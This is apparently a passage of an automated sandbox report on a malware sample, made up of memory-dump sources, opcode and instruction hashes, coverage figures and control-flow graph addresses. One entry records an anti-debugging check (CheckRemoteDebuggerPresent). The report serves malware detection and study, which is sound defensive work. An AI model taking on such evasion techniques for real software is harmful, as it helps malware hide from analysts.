                                                  • Opcode Fuzzy Hash: c499414976212d080bf0ee3e997e2bd717589d31133039c0cb9aae76f04fd7f5
                                                  • Instruction Fuzzy Hash: DFB09274A00218CFC708DB38C86086D73B2BF8C39136588A8D001DB235CA399881DA10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: J:
                                                  • API String ID: 0-1760335274
                                                  • Opcode ID: 63114efca4c7dfad61a95b432da67bdbd65ba58943232d71f44e069c75557e60
                                                  • Instruction ID: b33a1288c92b053cb4415789526430ed2f5459221697ecc2789511a350f832da
                                                  • Opcode Fuzzy Hash: 63114efca4c7dfad61a95b432da67bdbd65ba58943232d71f44e069c75557e60
                                                  • Instruction Fuzzy Hash: EED1ACF1B00605CBEB25DB75C8517AEB7F6AF89300F14446DD20ACBAA2DB35E901CB52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2187198108.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_51f0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b681110a826590bfa82b772beb4910644cbecabbbd48f627766feaf127d853d
                                                  • Instruction ID: 6a7cecb46a7152872cdebfd8893c35bbfbe34ca64ca10907fb935753d6c76bf3
                                                  • Opcode Fuzzy Hash: 3b681110a826590bfa82b772beb4910644cbecabbbd48f627766feaf127d853d
                                                  • Instruction Fuzzy Hash: 8B1261B04017498EE730AF65ED4C1D97AA1B745328BB04709D2E56B2E9EBBE114BCF48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a5f156bcc65486266638f9006a7dbb0717e58810a399ca6a517398128c27c418
                                                  • Instruction ID: 2ce26425ce9a23604c958e6d41bdbf891ffa09864de1800ad2efd9d8a2cef6a0
                                                  • Opcode Fuzzy Hash: a5f156bcc65486266638f9006a7dbb0717e58810a399ca6a517398128c27c418
                                                  • Instruction Fuzzy Hash: 00E14CB4E002598FDB24DFA9C5909AEFBF2FF89305F248159D508AB715D730A942CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: df4602e9b3e04c2b7ddd78cb0df08632bf134e044e2c30288e3366f7ea8439da
                                                  • Instruction ID: 0045f1bde512510327ba21eb9e3c28df4a4451dc3a94a15c049cbf1cb15a7f40
                                                  • Opcode Fuzzy Hash: df4602e9b3e04c2b7ddd78cb0df08632bf134e044e2c30288e3366f7ea8439da
                                                  • Instruction Fuzzy Hash: 71E12EB4E002598FDB24DFA9C5809AEFBF2FF89305F248169D518AB755D730A942CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0c68bcfc74c491529d60966a071bef64dabaffd9d7c8456839f2ff5a8a184be1
                                                  • Instruction ID: 88d2f22a6bff37f679ea29ced5bf7c507fcf3afa135dcb68f55b8ae72b918f0a
                                                  • Opcode Fuzzy Hash: 0c68bcfc74c491529d60966a071bef64dabaffd9d7c8456839f2ff5a8a184be1
                                                  • Instruction Fuzzy Hash: 36D1A774A01609CFEB18DF69C598AE9B7F1AF8D701F2580A8E509EB761DB319D40CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2181909353.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ff0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b637acd1c8627eee951c33a76a547de7ca15fd92c4f4e941ebdded06a731e506
                                                  • Instruction ID: 229afd5dbb34ff358520e2b77128f9307b2767132a0b06bacd1d29f3a922ce0f
                                                  • Opcode Fuzzy Hash: b637acd1c8627eee951c33a76a547de7ca15fd92c4f4e941ebdded06a731e506
                                                  • Instruction Fuzzy Hash: CAA16F32E002098FCF15DFB4C8805AEBBB2FF85300B25457AE905AB265DB75ED59DB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2187198108.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_51f0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf77c52e15d0b8396e129e051947d1a6b44beaecfdc83712a551fa19ddf4ffbf
                                                  • Instruction ID: 3595ca5822276fff5da21107fe94c6ba03614d090a6b127830ed83a71a849b7d
                                                  • Opcode Fuzzy Hash: bf77c52e15d0b8396e129e051947d1a6b44beaecfdc83712a551fa19ddf4ffbf
                                                  • Instruction Fuzzy Hash: F0C1F5B18017498ED730EF25EC481D97BB1BB85324F714719D1A16B2E9EBBE144ACF48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189625845.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: true
                                                  • Associated: 00000000.00000002.2189563322.0000000007130000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7130000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9a0cf511cd522607dfceba3fb062a65564f2902e76936e122e11c61e7c5e1106
                                                  • Instruction ID: d9bda87975ae59bd5440f4ca2e0c2754037364d9242439c550225aa54dc7c650
                                                  • Opcode Fuzzy Hash: 9a0cf511cd522607dfceba3fb062a65564f2902e76936e122e11c61e7c5e1106
                                                  • Instruction Fuzzy Hash: ED810FB4E10219CFCB44CFA9C58899EFBF2FF89250F15815AE415AB364D370AA82CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2187198108.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_51f0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e9910d7daf14a3bd6b2bb2e1af1e304ad7c4ec4dcc8ccff0ec28a0b8cd4536fd
                                                  • Instruction ID: 38716a412d6ecb1ffbd3cf47282c7ef9d22eccb1f8807605d892a37678a02461
                                                  • Opcode Fuzzy Hash: e9910d7daf14a3bd6b2bb2e1af1e304ad7c4ec4dcc8ccff0ec28a0b8cd4536fd
                                                  • Instruction Fuzzy Hash: 83714A75E1421ADFCB08CFA9D4819EEFBB2FF88310F158426D905A7254D7749A42CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2187198108.00000000051F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_51f0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9858bc5e3facf6e97466a2ef3492083d03f47587b3b3d32400a289901c2a0d01
                                                  • Instruction ID: 35604af3d27cf636008c3514fb24253de649d0e645544a57721971aefb45f8e9
                                                  • Opcode Fuzzy Hash: 9858bc5e3facf6e97466a2ef3492083d03f47587b3b3d32400a289901c2a0d01
                                                  • Instruction Fuzzy Hash: D27125B4E15219DBCB18CF99D4819EEFBB2FB88310F11852AE915AB354D3749A42CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189625845.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: true
                                                  • Associated: 00000000.00000002.2189563322.0000000007130000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7130000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f042fbc56bab8b2d11610e8e00fb831b00a122d7f8af5ea42c13c6f17be7f685
                                                  • Instruction ID: 4d553b473831772aeddba1ec20de479bbe23e81b0585b9df75328b09389a5dd2
                                                  • Opcode Fuzzy Hash: f042fbc56bab8b2d11610e8e00fb831b00a122d7f8af5ea42c13c6f17be7f685
                                                  • Instruction Fuzzy Hash: 956149B8A25709EFC745CFA2F48B09ABFB5F789300F21D495E095AB1C4CB7482A5C708
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189625845.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: true
                                                  • Associated: 00000000.00000002.2189563322.0000000007130000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7130000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 27fa0272ae20c5bf05cad4512b9c07f815338fd8bfa32c576e47ef851879eb14
                                                  • Instruction ID: b893fef6c9fbbfa474edf280a21075ca6bea10548c2c1ee7e6f505a6b6b5a47a
                                                  • Opcode Fuzzy Hash: 27fa0272ae20c5bf05cad4512b9c07f815338fd8bfa32c576e47ef851879eb14
                                                  • Instruction Fuzzy Hash: BA61F6B4E1520ADFCB14CFA9C5915EEFBF6BF89200F54845AE425B7240D3349A82CF95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189961508.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73b0000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b9a6468d26031e6fecf40baf8865a3e36f07df112d04e24132b78524b3c91e7
                                                  • Instruction ID: 9af2aea545080c2434b7fc920022276ee911bb2e7074ed9609b9c912898bf87c
                                                  • Opcode Fuzzy Hash: 1b9a6468d26031e6fecf40baf8865a3e36f07df112d04e24132b78524b3c91e7
                                                  • Instruction Fuzzy Hash: 1D511CB4E002198FDB24CFA9C6805EEFBF2BF89305F248169D558AB715D7319942CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2189625845.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07130000, based on PE: true
                                                  • Associated: 00000000.00000002.2189563322.0000000007130000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7130000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6527ad649e6ab41da70235a7c9353face8b1c5af9ac9fbeb1ef13eefc352373f
                                                  • Instruction ID: 261e5472a31b20347be6e598f34306ffa5696e08a7153faef59e310c24f75723
                                                  • Opcode Fuzzy Hash: 6527ad649e6ab41da70235a7c9353face8b1c5af9ac9fbeb1ef13eefc352373f
                                                  • Instruction Fuzzy Hash: AF41C6B0D1460ADFDB48CFAAC4815AEFBF6BF89300F14D52AD425B7254D7349A418F94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:12.9%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:100%
                                                  Total number of Nodes:3
                                                  Total number of Limit Nodes:0
                                                  execution_graph 34776 2f97ec8 34777 2f97f0c CheckRemoteDebuggerPresent 34776->34777 34778 2f97f4e 34777->34778
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a54dbdbfa2c11db251eef1998673dafd12c4556bf9b664ea891a7a419a985c41
                                                  • Instruction ID: eafb4590b718266305a249e1ed4cfd8b512da693ecd01ca02a1833e58a0cf928
                                                  • Opcode Fuzzy Hash: a54dbdbfa2c11db251eef1998673dafd12c4556bf9b664ea891a7a419a985c41
                                                  • Instruction Fuzzy Hash: 8263D731D10B5A8ADB11EF68C890599F7B1FF99300F15D79AE4587B221EB70AAC4CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d257ec88b46e536e992bf6896e59d68c3d77474b74f19f3f6f73ffdce3e2cd86
                                                  • Instruction ID: e980aa54e6f9a744bc2a2900859d07ea1059c73fde46a71f3dee8d2f1c56c9e3
                                                  • Opcode Fuzzy Hash: d257ec88b46e536e992bf6896e59d68c3d77474b74f19f3f6f73ffdce3e2cd86
                                                  • Instruction Fuzzy Hash: FA332F31D107598EDB11EF68C8805ADF7B1FF99300F11D79AE458AB261EB70AAC5CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 895 2f97ec8-2f97f4c CheckRemoteDebuggerPresent 897 2f97f4e-2f97f54 895->897 898 2f97f55-2f97f90 895->898 897->898
                                                  APIs
                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02F97F3F
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4630286830.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2f90000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0
                                                  • Opcode ID: 65329660ef3260488e0b746c7b04449fe55081966283b058b09d77dcf4a4fb84
                                                  • Instruction ID: 320eb0780f3e04e2a861e7346c3a33fcf0c099abc87313eb98fde1d57285ff20
                                                  • Opcode Fuzzy Hash: 65329660ef3260488e0b746c7b04449fe55081966283b058b09d77dcf4a4fb84
                                                  • Instruction Fuzzy Hash: 6A2148B1800259CFDB00CF9AC484BEEFBF4AF49310F14846AE559B7250D738A944CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0635b5ad1216779fc422cde3b19b4d75a962df9cd31935e5a014be1621e23007
                                                  • Instruction ID: 5790dbb5eba60d75a5657d12cacca0f17928a0119ef118df342f0d22c89c52ca
                                                  • Opcode Fuzzy Hash: 0635b5ad1216779fc422cde3b19b4d75a962df9cd31935e5a014be1621e23007
                                                  • Instruction Fuzzy Hash: 34923734A003048FDB64DB68C584AADBBF2EF45319F5994AAD41A9F391DB35EC85CF80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2200 6ea8810-6ea882d 2201 6ea882f-6ea8832 2200->2201 2202 6ea884e-6ea8851 2201->2202 2203 6ea8834-6ea8849 2201->2203 2204 6ea892f-6ea8932 2202->2204 2205 6ea8857-6ea885a 2202->2205 2203->2202 2207 6ea88d8-6ea88e2 2204->2207 2208 6ea8934 2204->2208 2209 6ea8898-6ea889b 2205->2209 2210 6ea885c-6ea8865 2205->2210 2216 6ea88e9-6ea88eb 2207->2216 2213 6ea8939-6ea893c 2208->2213 2211 6ea896b-6ea8974 2209->2211 2212 6ea88a1-6ea88a4 2209->2212 2214 6ea886b-6ea8873 2210->2214 2215 6ea89f5-6ea8a23 2210->2215 2211->2210 2219 6ea897a 2211->2219 2217 6ea88b0-6ea88b3 2212->2217 2218 6ea88a6-6ea88af 2212->2218 2220 6ea8959-6ea895c 2213->2220 2221 6ea893e-6ea8954 2213->2221 2214->2215 2222 6ea8879-6ea8889 2214->2222 2251 6ea8a2d-6ea8a30 2215->2251 2223 6ea88f0-6ea88f3 2216->2223 2227 6ea88bd-6ea88c0 2217->2227 2228 6ea88b5-6ea88ba 2217->2228 2226 6ea897f-6ea8982 2219->2226 2224 6ea895e-6ea8961 2220->2224 2225 6ea8966-6ea8969 2220->2225 2221->2220 2222->2215 2230 6ea888f-6ea8893 2222->2230 2232 6ea8909-6ea890c 2223->2232 2233 6ea88f5-6ea8904 2223->2233 2224->2225 2225->2211 2225->2226 2234 6ea89a6-6ea89a9 2226->2234 2235 6ea8984-6ea89a1 2226->2235 2236 6ea88c2-6ea88c8 2227->2236 2237 6ea88d3-6ea88d6 2227->2237 2228->2227 2230->2209 2240 6ea890e-6ea8913 2232->2240 2241 6ea8916-6ea8919 2232->2241 2233->2232 2242 6ea89ab-6ea89ac 2234->2242 2244 6ea89b1-6ea89b4 2234->2244 2235->2234 2236->2242 2243 6ea88ce 2236->2243 2237->2207 2237->2223 2240->2241 2246 6ea892a-6ea892d 2241->2246 2247 6ea891b-6ea891f 2241->2247 2242->2244 2243->2237 2249 6ea89c8-6ea89cb 2244->2249 2250 6ea89b6-6ea89c3 2244->2250 2246->2204 2246->2213 2254 6ea89e7-6ea89f4 2247->2254 2255 6ea8925 2247->2255 2252 6ea89cd-6ea89d0 2249->2252 2253 6ea89d5-6ea89d7 2249->2253 2250->2249 2257 6ea8a32-6ea8a3c 2251->2257 2258 6ea8a41-6ea8a44 2251->2258 2252->2253 2259 6ea89d9 2253->2259 2260 6ea89de-6ea89e1 2253->2260 2255->2246 2257->2258 2262 6ea8a5c-6ea8a5f 2258->2262 2263 6ea8a46-6ea8a57 2258->2263 2259->2260 2260->2201 2260->2254 2265 6ea8a81-6ea8a84 2262->2265 2266 6ea8a61-6ea8a65 2262->2266 2263->2262 2267 6ea8a8e-6ea8a91 2265->2267 2268 6ea8a86-6ea8a8d 2265->2268 2270 6ea8a6b-6ea8a73 2266->2270 2271 6ea8b12-6ea8b4b 2266->2271 2272 6ea8a93-6ea8a9a 2267->2272 2273 6ea8aa1-6ea8aa4 2267->2273 2270->2271 2274 6ea8a79-6ea8a7c 2270->2274 2288 6ea8b4d-6ea8b50 2271->2288 2278 6ea8b0a-6ea8b11 2272->2278 2279 6ea8a9c 2272->2279 2275 6ea8abe-6ea8ac1 2273->2275 2276 6ea8aa6-6ea8aaa 2273->2276 2274->2265 2282 6ea8adb-6ea8ade 2275->2282 2283 6ea8ac3-6ea8ac7 2275->2283 2276->2271 2280 6ea8aac-6ea8ab4 2276->2280 2279->2273 2280->2271 2284 6ea8ab6-6ea8ab9 2280->2284 2286 6ea8af8-6ea8afa 2282->2286 2287 6ea8ae0-6ea8ae4 2282->2287 2283->2271 2285 6ea8ac9-6ea8ad1 2283->2285 2284->2275 2285->2271 2291 6ea8ad3-6ea8ad6 2285->2291 2293 6ea8afc 2286->2293 2294 6ea8b01-6ea8b04 2286->2294 2287->2271 2292 6ea8ae6-6ea8aee 2287->2292 2289 6ea8b6b-6ea8b6e 2288->2289 2290 6ea8b52-6ea8b64 2288->2290 2295 6ea8b89-6ea8b8c 2289->2295 2296 6ea8b70-6ea8b82 2289->2296 2299 6ea8b8e-6ea8ba0 2290->2299 2303 6ea8b66 2290->2303 2291->2282 2292->2271 2297 6ea8af0-6ea8af3 2292->2297 2293->2294 2294->2251 2294->2278 2295->2299 2300 6ea8ba7-6ea8baa 2295->2300 2307 6ea8be1-6ea8bf4 2296->2307 2308 6ea8b84 2296->2308 2297->2286 2301 6ea8bac-6ea8bb1 2299->2301 2312 6ea8ba2 2299->2312 2300->2301 2302 6ea8bb4-6ea8bb7 2300->2302 2301->2302 2305 6ea8c0a-6ea8d76 2302->2305 2306 6ea8bb9-6ea8bbc 2302->2306 2303->2289 2352 6ea8eab-6ea8ebe 2305->2352 2353 6ea8d7c-6ea8d83 2305->2353 2310 6ea8bbe-6ea8bd0 2306->2310 2311 6ea8bd7-6ea8bda 2306->2311 2308->2295 2310->2301 2319 6ea8bd2 2310->2319 2311->2305 2314 6ea8bdc-6ea8bdf 2311->2314 2312->2300 2314->2307 2317 6ea8bf7-6ea8bfa 2314->2317 2320 6ea8bfc-6ea8bfe 2317->2320 2321 6ea8c01-6ea8c04 2317->2321 2319->2311 2320->2321 2321->2305 2322 6ea8ec1-6ea8ec4 2321->2322 2324 6ea8ece-6ea8ed1 2322->2324 2325 6ea8ec6-6ea8ecb 2322->2325 2326 6ea8ed3-6ea8ee5 2324->2326 2327 6ea8ef0-6ea8ef2 2324->2327 2325->2324 2326->2301 2333 6ea8eeb 2326->2333 2328 6ea8ef9-6ea8efc 2327->2328 2329 6ea8ef4 2327->2329 2328->2288 2332 6ea8f02-6ea8f0b 2328->2332 2329->2328 2333->2327 2354 6ea8d89-6ea8dbb 2353->2354 2355 6ea8e36-6ea8e3d 2353->2355 2366 6ea8dbd 2354->2366 2367 6ea8dc0-6ea8e01 2354->2367 2355->2352 2357 6ea8e3f-6ea8e72 2355->2357 2368 6ea8e77-6ea8ea4 2357->2368 2369 6ea8e74 2357->2369 2366->2367 2377 6ea8e19-6ea8e20 2367->2377 2378 6ea8e03-6ea8e14 2367->2378 2368->2332 2368->2352 2369->2368 2380 6ea8e28-6ea8e2a 2377->2380 2378->2332 2380->2332
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 971163e9fd771d320bd49d3097673c2cf1646dd6caca83cf306c91cb6127a0e8
                                                  • Instruction ID: 9b632ba90ee5eb7ed35c3872566765b6571f059bf44ae522a1170072c909fa98
                                                  • Opcode Fuzzy Hash: 971163e9fd771d320bd49d3097673c2cf1646dd6caca83cf306c91cb6127a0e8
                                                  • Instruction Fuzzy Hash: 6712DE75F003458BDB64DB64D8806AFBBB2EF84314F249529E85A9F384DB34EC42CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f58382b513ea6e818e11f205348a5d9632ea29a09624ede2fb53d786bdb04c81
                                                  • Instruction ID: c8eae093587656c4aef1fe847dcedb5cc21308ec4fd42f66afeb30ea4db7dced
                                                  • Opcode Fuzzy Hash: f58382b513ea6e818e11f205348a5d9632ea29a09624ede2fb53d786bdb04c81
                                                  • Instruction Fuzzy Hash: 52227070E013098BEFA4CB68D5947AEB7B2FB89314F249525E405EF381DA35EC81DB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 2888 6ea66d8-6ea66f9 2889 6ea66fb-6ea66fe 2888->2889 2890 6ea6e9f-6ea6ea2 2889->2890 2891 6ea6704-6ea6723 2889->2891 2892 6ea6ec8-6ea6eca 2890->2892 2893 6ea6ea4-6ea6ec3 2890->2893 2901 6ea673c-6ea6746 2891->2901 2902 6ea6725-6ea6728 2891->2902 2894 6ea6ecc 2892->2894 2895 6ea6ed1-6ea6ed4 2892->2895 2893->2892 2894->2895 2895->2889 2898 6ea6eda-6ea6ee3 2895->2898 2905 6ea674c-6ea675b 2901->2905 2902->2901 2903 6ea672a-6ea673a 2902->2903 2903->2905 3014 6ea675d call 6ea6ef8 2905->3014 3015 6ea675d call 6ea6ef1 2905->3015 2907 6ea6762-6ea6767 2908 6ea6769-6ea676f 2907->2908 2909 6ea6774-6ea6a51 2907->2909 2908->2898 2930 6ea6e91-6ea6e9e 2909->2930 2931 6ea6a57-6ea6b06 2909->2931 2940 6ea6b08-6ea6b2d 2931->2940 2941 6ea6b2f 2931->2941 2943 6ea6b38-6ea6b3f 2940->2943 2941->2943 2944 6ea6b46-6ea6b4b 2943->2944 2945 6ea6e78-6ea6e84 2944->2945 2946 6ea6b51-6ea6b73 2944->2946 2945->2931 2947 6ea6e8a 2945->2947 2946->2945 2949 6ea6b79-6ea6b83 2946->2949 2947->2930 2949->2945 2950 6ea6b89-6ea6b94 2949->2950 2950->2945 2951 6ea6b9a-6ea6c70 2950->2951 2963 6ea6c7e-6ea6cae 2951->2963 2964 6ea6c72-6ea6c74 2951->2964 2968 6ea6cbc-6ea6cc8 2963->2968 2969 6ea6cb0-6ea6cb2 2963->2969 2964->2963 2970 6ea6cca-6ea6cce 2968->2970 2971 6ea6d28-6ea6d2c 2968->2971 2969->2968 2970->2971 2974 6ea6cd0-6ea6cfa 2970->2974 2972 6ea6e69-6ea6e72 2971->2972 2973 6ea6d32-6ea6d6e 2971->2973 2972->2945 2972->2951 2985 6ea6d7c-6ea6d8a 2973->2985 2986 6ea6d70-6ea6d72 2973->2986 2981 6ea6d08-6ea6d25 2974->2981 2982 6ea6cfc-6ea6cfe 2974->2982 2981->2971 2982->2981 2988 6ea6d8c-6ea6d97 2985->2988 2989 6ea6da1-6ea6dac 2985->2989 2986->2985 2988->2989 2992 6ea6d99 2988->2992 2993 6ea6dae-6ea6db4 2989->2993 2994 6ea6dc4-6ea6dd5 2989->2994 2992->2989 2995 6ea6db8-6ea6dba 2993->2995 2996 6ea6db6 2993->2996 2998 6ea6ded-6ea6df9 2994->2998 2999 6ea6dd7-6ea6ddd 2994->2999 2995->2994 2996->2994 3003 6ea6dfb-6ea6e01 2998->3003 3004 6ea6e11-6ea6e62 2998->3004 3000 6ea6ddf 2999->3000 3001 6ea6de1-6ea6de3 2999->3001 3000->2998 3001->2998 3005 6ea6e03 3003->3005 3006 6ea6e05-6ea6e07 3003->3006 3004->2972 3005->3004 3006->3004 3014->2907 3015->2907
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.4635855040.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_6ea0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 964aa1b99c3c8ce5e1fede07ff23ff759abd26b99f01b69366abbbc99c80f6b3
                                                  • Instruction ID: bdf764bb41c27966e3bb74a05958508d7e0387def8c4a16c31ed1f84eb4c2c24
                                                  • Opcode Fuzzy Hash: 964aa1b99c3c8ce5e1fede07ff23ff759abd26b99f01b69366abbbc99c80f6b3
                                                  • Instruction Fuzzy Hash: 32323E31E1175ACFDB14EF75C85059DB7B2FF99300F24D6A9D40AAB254EB30AA85CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
